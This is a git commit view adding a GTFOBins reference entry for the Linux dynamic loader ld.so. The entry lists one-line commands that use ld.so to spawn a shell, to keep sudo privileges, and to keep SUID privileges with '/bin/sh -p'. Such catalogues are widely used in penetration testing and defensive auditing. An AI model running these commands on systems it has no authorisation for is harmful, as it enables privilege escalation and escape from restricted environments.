First commit
This commit is contained in:
10
_gtfobins/ld.so.md
Normal file
10
_gtfobins/ld.so.md
Normal file
@@ -0,0 +1,10 @@
|
||||
---
|
||||
description: Ld.so is the Linux dynamic linker/loader. Its file name and location might change between Linux versions.
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: /lib/ld.so /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./ld.so /bin/sh -p
|
||||
---
|
||||
Reference in New Issue
Block a user